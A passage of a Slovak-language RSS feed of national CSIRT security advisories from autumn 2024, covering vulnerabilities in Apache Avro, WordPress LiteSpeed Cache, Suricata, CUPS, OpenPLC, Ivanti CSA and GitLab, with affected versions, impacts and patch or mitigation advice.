<li><a href="https://www.bleepingcomputer.com/news/security/qualcomm-patches-high-severity-zero-day-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/qualcomm-patches-high-severity-zero-day-exploited-in-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1428/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť Apache Avro umožňuje vykonávať kód</title>
		<link>/posts/1424</link>
					<comments>/posts/1424#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 09 Oct 2024 12:09:21 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache Avro]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1424</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Apache_Avro_Logo.svg_-1024x349.png" alt="" /></p>Systém pre serializáciu dát Apache Avro Java SDK kvôli chybe v spracovaní používateľských schém umožňuje útočníkom získať schopnosť vzdialeného vykonávania kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Apache_Avro_Logo.svg_-1024x349.png" alt="" /></p>
<p><strong>Systém pre serializáciu dát Apache Avro Java SDK kvôli chybe v spracovaní používateľských schém umožňuje útočníkom získať schopnosť vzdialeného vykonávania kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache Avro Java SDK verzie staršie ako 1.11.4</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-47561</strong> (CVSS skóre 7,3)</p>



<p>Vývojári Apache Avro Java SDK vydali aktualizácie svojho produktu, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2024-47561 spočíva v nesprávnom spracovaní používateľských schém v rámci direktív ReflectData a SpecificData a útočník by ju prostredníctvom podvrhnutia špeciálne vytvorenej schémy mohol zneužiť na vykonanie škodlivého kódu.<br><br>Zraniteľnosť objavil výskumník Kostya Kortchinsky z tímu Databricks Security Team.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Apache Avro Java SDK na verziu 1.11.4 alebo 1.12.0.<br><br>Pre mitigovanie zraniteľnosti môžete zakázať spracovanie používateľských schém alebo ich pred spracovaním sanitizovať.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47561">https://nvd.nist.gov/vuln/detail/CVE-2024-47561</a></li>



<li><a href="https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x">https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x<span style="font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:minor-latin;
mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;color:black;
font-weight:normal;mso-bidi-font-weight:bold"></span></a></li>



<li><a href="https://thehackernews.com/2024/10/critical-apache-avro-sdk-flaw-allows.html">https://thehackernews.com/2024/10/critical-apache-avro-sdk-flaw-allows.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1424/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností september 2024</title>
		<link>/posts/1412</link>
					<comments>/posts/1412#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 08 Oct 2024 06:24:48 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1412</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci september 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci september 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/10/2024_09_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/09/2024_08_mesacnik.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 09/2024 PDF (619 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" data-type="link" data-id="https://www.csirt.gov.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti.html?csrt=4087702320029811072">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1412/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť WordPress LiteSpeed Cache umožňuje stored XSS</title>
		<link>/posts/1409</link>
					<comments>/posts/1409#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 08 Oct 2024 06:20:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[LiteSpeed Cache]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1409</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Vývojári pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť súvisiacu s&#160;absentujúcou sanitizáciou parametrov z&#160;HTTP požiadaviek. Tieto...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Vývojári pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť súvisiacu s&nbsp;absentujúcou sanitizáciou parametrov z&nbsp;HTTP požiadaviek. Tieto plugin preberá a&nbsp;ukladá na administrátorskú stránku, čo vedie k&nbsp;možnosti vykonávať útoky typu stored XSS.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress LiteSpeed Cache 6.5.0.2 a&nbsp;staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-47374</strong><strong> (CVSS skóre 7,1)</strong></p>



<p>Vývojári pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravili vysoko závažnú zraniteľnosť. CVE-2024-47374 spočíva v nesprávnej sanitizácii poľa X-LSCACHE-VARY-VALUE v HTTP hlavičkách, ktorého hodnotu preberá funkcia „Vary Group“ a publikuje ju na administrátorskej stránke. Vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorenej HTTP požiadavky mohol zneužiť na realizáciu útokov typu Stored XSS (Cross Site Scripting) a následne získanie neoprávneného prístupu k citlivým údajom a eskaláciu privilégií. Zraniteľnosť je možné zneužiť len na systémoch, na ktorých sú súčasne aktivované funkcie &#8220;CSS Combine&#8221; a &#8220;Generate UCSS&#8221;. </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia WordPress LiteSpeed Cache na verziu 6.5.1.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://patchstack.com/articles/unauthenticated-stored-xss-vulnerability-in-litespeed-cache-plugin-affecting-6-million-sites/" target="_blank" rel="noreferrer noopener">https://patchstack.com/articles/unauthenticated-stored-xss-vulnerability-in-litespeed-cache-plugin-affecting-6-million-sites/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47374" target="_blank" rel="noreferrer noopener">https://nvd.nist.gov/vuln/detail/CVE-2024-47374</a></p>



<p><a href="https://thehackernews.com/2024/10/wordpress-litespeed-cache-plugin.html" target="_blank" rel="noreferrer noopener">https://thehackernews.com/2024/10/wordpress-litespeed-cache-plugin.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1409/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v IDS/IPS Suricata</title>
		<link>/posts/1406</link>
					<comments>/posts/1406#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 08 Oct 2024 06:18:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Suricata]]></category>
		<guid isPermaLink="false">/?p=1406</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Logo-Suricata-vert-R-1024x746.png" alt="" /></p>Vývojári IDS/IPS systému a sieťového analyzátora Suricata vydali aktualizáciu svojho produktu, ktorá opravuje šesť zraniteľností, z čoho tri sú označené...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Logo-Suricata-vert-R-1024x746.png" alt="" /></p>
<p><strong>Vývojári IDS/IPS systému a sieťového analyzátora Suricata vydali aktualizáciu svojho produktu, ktorá opravuje šesť zraniteľností, z čoho tri sú označené ako kritické. Zraniteľnosti možno zneužiť na obídenie bezpečnostných mechanizmov, vzdialené vykonanie škodlivého kódu a zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Suricata, verzie staršie ako 7.0.7</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Nová verzia IDS/ IPS Suricata opravuje tri kritické a tri vysoko závažné zraniteľnosti. Žiadne bližšie informácie neboli zverejnené.</p>



<p><strong>CVE-2024-45797 </strong>(kritická)</p>



<p><strong>CVE-2024-47187 </strong>(kritická)</p>



<p><strong>CVE-2024-47188 </strong>(kritická)</p>



<p><strong>CVE-2024-47522 </strong>(vysoko závažná)</p>



<p><strong>CVE-2024-45795 </strong>(vysoko závažná)</p>



<p><strong>CVE-2024-45796 </strong>(vysoko závažná)</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Suricata na verziu 7.0.7.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://suricata.io/2024/10/01/suricata-7-0-7-released/" target="_blank" rel="noreferrer noopener">https://suricata.io/2024/10/01/suricata-7-0-7-released/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1406/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v tlačovom subsystéme pre Unix a Linux možno zneužiť na vzdialené vykonanie kódu</title>
		<link>/posts/1401</link>
					<comments>/posts/1401#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Sep 2024 12:08:13 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1401</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/linux.png" alt="" /></p>Implementácia internetového tlačového protokolu IPP pre unixové systémy CUPS obsahuje 4 zraniteľnosti, z ktorých jedna je označená ako kritická. Zreťazením...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/linux.png" alt="" /></p>
<p><strong>Implementácia internetového tlačového protokolu IPP pre unixové systémy CUPS obsahuje 4 zraniteľnosti, z ktorých jedna je označená ako kritická. Zreťazením zraniteľností by vzdialený neautentifikovaný útočník mohol získať kontrolu nad parametrami v&nbsp;súbore PPD a&nbsp;možnosť vzdialene vykonávať kód.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>cups-filters 2.0.1 a staršie</li>



<li>libcupsfilters 2.1b1 a&nbsp;staršie</li>



<li>libppd 2.1b1 a staršie</li>



<li>cups-browsed 2.0.1 a&nbsp;staršie</li>
</ul>



<p><em>Tieto služby sú prítomné na väčšine unixových systémov, vrátane väčšiny distribúcií GNU/Linux, BSD, Solaris a&nbsp;Chromium/ChromeOS.</em><em></em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Modulárny tlačový subsystém CUPS (Common UNIX Printing System) pre operačné systémy na báze Unix, ktorý je implementáciou protokolu IPP (Internet Printing Protocol), obsahuje 1 kritickú a&nbsp;3 vysoko závažné zraniteľnosti. Ich kombináciou môže vzdialený neautentifikovaný útočník dosiahnuť schopnosť vzdialene vykonávať kód na zariadení, odkiaľ bola spustená tlačová úloha. Vzhľadom na povahu CUPS môže útočník zneužiť zraniteľnosti priamo z&nbsp;internetu.</strong><strong></strong></p>



<p><strong>CVE-2024-47177</strong><strong> (CVSS skóre 9,0)</strong></p>



<p><strong>Kritická zraniteľnosť v cups-filters. Tlačový filter foomatic-rip umožňuje vykonávať ľubovoľné príkazy vo FoomaticRIPCommandLine. Útočník na to môže zneužiť hodnoty v&nbsp;súbore PPD, ktorý ich posúva konzole.</strong></p>



<p><strong>CVE-2024-47076 </strong><strong>(CVSS skóre 8,6)</strong></p>



<p><strong>Vysoko závažná zraniteľnosť v&nbsp;knižnici&nbsp;libcupsfilters. Chýbajúca sanitizácia a&nbsp;validácia atribútov prijímaných zo servera IPP vo funkcii cfGetPrinterAttributes5 umožňuje útočníkovi podvrhnúť dáta ďalším súčastiam systému CUPS.</strong></p>



<p><strong>CVE-2024-47175 </strong><strong>(CVSS skóre 8,6)</strong><strong></strong></p>



<p><strong>Vysoko závažná zraniteľnosť v&nbsp;libppd. Vo funkcii ppdCreatePPDFromIPP2 chýba sanitizácia a&nbsp;validácia IPP atribútov zapisovaných do súboru PPD, čo umožňuje útočníkom kontrolovať obsah súboru PPD.</strong></p>



<p><strong>CVE-2024-47176 </strong><strong>(CVSS skóre 8,3)</strong></p>



<p><strong>Vysoko závažná zraniteľnosť v cups-browsed. Tento komponent CUPS počúva na UDP porte 631 bez kontroly zdroja komunikácie. Útočník tak môže spôsobiť vykonanie požiadavky </strong>Get-Printer-Attributes IPP z URL adresy, ktorú má pod kontrolou.<strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie príkazov a kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Na uvedené zraniteľnosti v&nbsp;súčasnosti nie sú dostupné aktualizácie. Odporúčame sledovať stránku výrobcu a&nbsp;po vydaní aktualizácií bezodkladne vykonať aktualizáciu zasiahnutých systémov.</p>



<p><strong>Pre mitigáciu zraniteľností odporúčame zakázať a&nbsp;odobrať službu</strong> <strong>cups-browsed, alebo na firewalle blokovať sieťovú komunikáciu na UDP port 631 a&nbsp;komunikáciu súvisiacu s&nbsp;protokolmi zeroconf, mDNS a DNS-SD.</strong><strong><em></em></strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Summary">https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Summary</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cups-flaws-enable-linux-remote-code-execution-but-theres-a-catch/">https://www.bleepingcomputer.com/news/security/cups-flaws-enable-linux-remote-code-execution-but-theres-a-catch/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47177">https://nvd.nist.gov/vuln/detail/CVE-2024-47177</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47076">https://nvd.nist.gov/vuln/detail/CVE-2024-47076</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47175">https://nvd.nist.gov/vuln/detail/CVE-2024-47175</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47176">https://nvd.nist.gov/vuln/detail/CVE-2024-47176</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1401/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická a závažné zraniteľnosti OpenPLC</title>
		<link>/posts/1391</link>
					<comments>/posts/1391#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 27 Sep 2024 13:55:17 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[OpenPLC]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1391</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/runtime.webp" alt="" /></p>Kyberbezpečnostná jednotka Talos spoločnosti Cisco zverejnila podrobnosti o&#160;viacerých opravených zraniteľnostiach v&#160;programovateľnom logickom ovládači OpenPLC, ktoré možno zneužiť pri útokoch DoS...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/runtime.webp" alt="" /></p>
<p><strong>Kyberbezpečnostná jednotka Talos spoločnosti Cisco zverejnila podrobnosti o&nbsp;viacerých opravených zraniteľnostiach v&nbsp;programovateľnom logickom ovládači OpenPLC, ktoré možno zneužiť pri útokoch DoS a&nbsp;na vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>OpenPLC _v3 b4702061dc14d1024856f71b4543298d77007b88</li>



<li>OpenPLC _v3 16bf8bac1a36d95b73e7b8722d0edb8b9c5bb56a</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-34026</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť označená ako CVE-2024-34026 sa nachádza v parseri EtherNet/IP &nbsp;prostredia OpenPLC Runtime (verzia OpenPLV_v3 b4702061dc14d1024856f71b4543298d77007b88). &nbsp;Chyba spočíva v&nbsp;nedostatočnej kontrole veľkosti alokovanej pamäte pre uloženie záznamu o požiadavke, čo vedie k&nbsp;možnosti spôsobiť pretečenie zásobníka. Útočník môže odoslať špeciálne vytvorenú sériu požiadaviek EtherNet/IP, a tak získať schopnosť&nbsp;vzdialene vykonávať kód.</p>



<p><strong>CVE-2024-36980, CVE-2024-36981, CVE-2024-39589, CVE-2024-39590</strong> (CVSS skóre 7,5)</p>



<p>Zraniteľnosti sa nachádzajú v parseri EtherNet/IP PCCC prostredia OpenPLC Runtime. Odoslaním špeciálne vytvorených požiadaviek EtherNet/IP môže útočník spôsobiť odmietnutie služby (DoS).</p>



<ul>
<li>CVE-2024-36980 a CVE-2024-36981 (OpenPLC _v3 b4702061dc14d1024856f71b4543298d77007b88) umožňujú čítanie mimo povolený rozsah pamäte.</li>



<li>CVE-2024-39589 a CVE-2024-39590 (OpenPLC _v3 16bf8bac1a36d95b73e7b8722d0edb8b9c5bb56a) súvisia s&nbsp;nesprávnou dereferenciou ukazovateľa.</li>
</ul>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia</strong> na najnovšiu verziu OpenPLC.<br>Pokiaľ nemôžete aktualizovať na najnovšiu verziu, Cisco Talos odporúča pre zraniteľnosti <strong>CVE-2024-36981</strong> a <strong>CVE-2024-36980</strong> upraviť zdrojový kód tak, aby sa v dotknutom porovnávaní typ -1 zmenil na zodpovedajúci typ.<br><br><code><strong><i style="mso-bidi-font-style:
normal"><span style="color:black;font-weight:normal;mso-bidi-font-weight:bold">uint16_t newPcccSize = processPCCCMessage(pcccData, currentPcccSize);</span></i></strong><br>     <strong><i style="mso-bidi-font-style:
normal"><span style="color:black;
font-weight:normal;mso-bidi-font-weight:bold">if (newPcccSize == (uint16_t) -1)</span></i></strong><br>     <em>return -1;</em></code></p>



<p>Pre zmiernenie zraniteľností <strong>CVE-2024-39589</strong> a <strong>CVE-2024-39590</strong> upravte zdrojový kód tak, aby ste odstránili tri pretypovania ukazovateľov vo volaniach <em>Protected_Logical_Write_Reply memmov</em>e.</p>



<p><code><strong><i style="mso-bidi-font-style:
normal"><span style="color:black;font-weight:normal;mso-bidi-font-weight:bold">memmove(&amp;buffer[0], header.RP_CMD_Code, 1);</span></i></strong><br><strong><i style="mso-bidi-font-style:
normal"><span style="color:black;
font-weight:normal;mso-bidi-font-weight:bold"> </span></i></strong></code>    <code><strong><i style="mso-bidi-font-style:
normal"><span style="color:black;
font-weight:normal;mso-bidi-font-weight:bold">memmove(&amp;buffer[1], header.HD_Status, 1);</span></i></strong><br>   <em>memmove(&amp;buffer[2], header.HD_TransactionNum, 2);</em></code><br></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.securityweek.com/remote-code-execution-dos-vulnerabilities-patched-in-openplc/">https://www.securityweek.com/remote-code-execution-dos-vulnerabilities-patched-in-openplc/<span style="color:black"></span></a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-34026">https://nvd.nist.gov/vuln/detail/CVE-2024-34026<span style="color:black"></span></a></li>



<li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2024-2005">https://talosintelligence.com/vulnerability_reports/TALOS-2024-2005<span style="color:black"></span></a></li>



<li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2024-2004">https://talosintelligence.com/vulnerability_reports/TALOS-2024-2004<span style="color:black"></span></a></li>



<li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2024-2016">https://talosintelligence.com/vulnerability_reports/TALOS-2024-2016</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1391/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Útočníci zneužívajú kritickú zraniteľnosť Ivanti Cloud Services Appliance</title>
		<link>/posts/1372</link>
					<comments>/posts/1372#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 20 Sep 2024 10:48:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Ivanti]]></category>
		<guid isPermaLink="false">/?p=1372</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti informovala o novej kritickej zraniteľnosti v produkte CSA, ktorá umožňuje získať prístup ku chráneným funkcionalitám. Útočníci ju zneužívajú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti informovala o novej kritickej zraniteľnosti v produkte CSA, ktorá umožňuje získať prístup ku chráneným funkcionalitám. Útočníci ju zneužívajú v kombinácii s nedávno publikovanou zraniteľnosťou umožňujúcou vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti CSA (Cloud Services Appliance) verzia 4.6 pred Patch 519</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-8963</strong> (CVSSv3.0 skóre 9,4)</p>



<p>Spoločnosť IVANTI vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť v produkte Cloud Services Appliance. CVE-2024-8963 je chyba typu path traversal. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na obídenie mechanizmov autentifikácie a získanie prístupu k administrátorským funkcionalitám CSA.<br><br>Útočníci zraniteľnosť aktívne zneužívajú v kombinácii so zraniteľnosťou CVE-2024-8190, ktorá bola opravená už 10. septembra 2024. Chyba umožňovala injektovať systémové príkazy a vzdialene vykonávať kód, pokiaľ mal útočník administrátorský prístup k zariadeniu. Zraniteľnosť CVE-2024-8963 však dovoľuje túto podmienku obísť.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Eskalácia oprávnení</li>



<li>Prístup ku chráneným zdrojom</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na verziu Ivanti CSA 4.6 Patch 519 alebo CSA 5.0, vzhľadom na to, že verzia 4.6 už nie je podporovaná.<br><br>Spoločnosť Ivanti odporúča v CSA kontrolu používateľov, či nedošlo ku zmene alebo pridaniu nových účtov. Pre zníženie rizika odporúča nakonfigurovať dual homing s rozhraním eth0 ako internou sieťou a nasadiť EDR.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/ivanti-warns-of-another-critical-csa-flaw-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/ivanti-warns-of-another-critical-csa-flaw-exploited-in-attacks/</a></li>



<li><a href="https://www.securityweek.com/ivanti-warns-of-second-csa-vulnerability-exploited-in-attacks/">https://www.securityweek.com/ivanti-warns-of-second-csa-vulnerability-exploited-in-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1372/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť GitLab</title>
		<link>/posts/1368</link>
					<comments>/posts/1368#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Sep 2024 14:46:22 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[GitLab]]></category>
		<guid isPermaLink="false">/?p=1368</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>Spoločnosť GitLab vydala aktualizáciu opravujúcu kritickú zraniteľnosť, ktorá zasahuje autentifikačný proces na báze štandardu SAML. Chyba umožňuje neoverenému útočníkovi obísť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>
<p><strong>Spoločnosť GitLab vydala aktualizáciu opravujúcu kritickú zraniteľnosť, ktorá zasahuje autentifikačný proces na báze štandardu SAML. Chyba umožňuje neoverenému útočníkovi obísť prihlásenie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GitLab Community Edition (CE) staršie ako 17.3.3, 17.2.7, 17.1.8, 17.0.8 a 16.11.10<span style="font-family:&quot;Source Sans Pro&quot;,sans-serif;mso-fareast-font-family:
     &quot;Times New Roman&quot;;mso-bidi-font-family:&quot;Times New Roman&quot;"></span> </li>



<li>GitLab Enterprise Edition (EE) staršie ako 17.3.3, 17.2.7, 17.1.8, 17.0.8 a 16.11.10</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-45409</strong> (CVSS skóre 10,0)</p>



<p>Kritická zraniteľnosť CVE-2024-45409 súvisí s chybami v knižniciach <em>omniauth-saml</em> a <em>ruby-saml</em>, ktoré GitLab využíva v rámci autentifikácie na báze štandardu SAML (Security Assertion Markup Language). Knižnice nesprávne overujú podpis SAML odpovede. Neautentifikovaný útočník s prístupom k podpísanému dokumentu SAML tak môže vytvoriť falošnú odpoveď a prihlásiť sa ako ľubovoľný používateľ.<br>Zraniteľnosť zasahuje iba inštancie s nastavenou autentifikáciou pomocou SAML.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Obchádzanie bezpečnostných prvkov</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na verziu 17.3.3, 17.2.7, 17.1.8, 17.0.8 alebo 16.11.10. Tieto záplaty aktualizujú závislosti <em>omniauth-saml</em> na verziu 2.2.1 a <em>ruby-saml</em> na 1.17.0.<br><br>Pokiaľ aktualizácia nie je možná, vynúťte <a href="https://docs.gitlab.com/ee/user/profile/account/two_factor_authentication.html" data-type="link" data-id="https://docs.gitlab.com/ee/user/profile/account/two_factor_authentication.html">dvojfaktorovú autentifikáciu</a> pre <a href="https://docs.gitlab.com/ee/security/two_factor_authentication.html#enforce-2fa-for-all-users" data-type="link" data-id="https://docs.gitlab.com/ee/security/two_factor_authentication.html#enforce-2fa-for-all-users">všetkých používateľov</a>. Zároveň zakážte možnosť, aby ju prihlasovanie prostredníctvom <a href="https://docs.gitlab.com/ee/integration/saml.html#bypass-two-factor-authentication" data-type="link" data-id="https://docs.gitlab.com/ee/integration/saml.html#bypass-two-factor-authentication">SAML obchádzalo</a>.<br><br>Preveriť potenciálnu úspešnú kompromitáciu môžete v logoch <em>application_json</em> a <em>auth_json</em>, kde bude zaznamenaná hodnota <em>extern_id</em> a <em>extern_uid</em>, ktorú útočník použil. Znakom zneužitia zraniteľnosti môžu byť aj 